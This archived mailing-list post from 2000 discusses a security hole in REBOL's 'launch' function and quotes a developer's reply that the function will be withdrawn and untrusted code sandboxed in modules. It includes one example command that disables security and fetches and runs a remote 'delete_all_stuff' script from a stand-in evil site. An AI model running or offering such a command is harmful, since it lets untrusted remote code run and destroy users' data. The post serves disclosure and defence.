[ALLY] Launch security? Re:
From: brian:hawley:bigfoot at: 21-Aug-2000 11:46
Frank ([fsievert--uos--de]) wrote:
>I think that launch is not a really good idea. What happens, when I say
>
> launch {-s --do "do http://www.very-evil-site.com/delete_all_stuff.r"}
>
>in my REB site. This would allow me to kick away all of the security,
>wouldn't it?
Yes, it would. I wrote about this last Friday on the rebol list,
message #304082: "A small security hole REBOL, and a huge one!".
Take a look at that thread, it's interesting reading.
In reply, Jeff at REBOL Tech wrote:
>Launch, at least in its present form, will not likely be in
>the regular distribution. It went out in the windows view
>version by accident.
>
>The security risks of modifiable REBOL code will be best
>dealt with by modules. Untrusted REBOL code can evaluate in
>a module prevented from affecting the surrounding execution
>environment.
Sounds like good news, doesn't it?
Brian Hawley